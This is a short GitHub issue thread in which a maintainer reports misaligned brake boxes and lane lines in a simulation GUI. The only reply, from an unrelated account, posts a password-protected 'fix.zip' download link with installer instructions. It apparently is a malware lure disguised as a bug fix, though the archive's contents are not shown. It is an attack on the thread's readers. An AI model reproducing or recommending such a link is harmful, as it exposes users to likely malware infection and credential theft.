### ISSUE TITLE
Graphic Misalignments 

### ISSUE THREAD

**Issue by QaisHamarneh** [QaisHamarneh/mlsl-simulation#8]
Something is a bit off in the GUI especially during the crossing. The end of the brake box is not straight and the "horizontal" lines don't always align with the lane borders. 

This is not a high priority, but just to look into at some point. 

![Screenshot 2024-08-26 at 11 46 10](https://github.com/user-attachments/assets/1ed6652b-5d87-4252-94a2-ce47427a8c92)

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
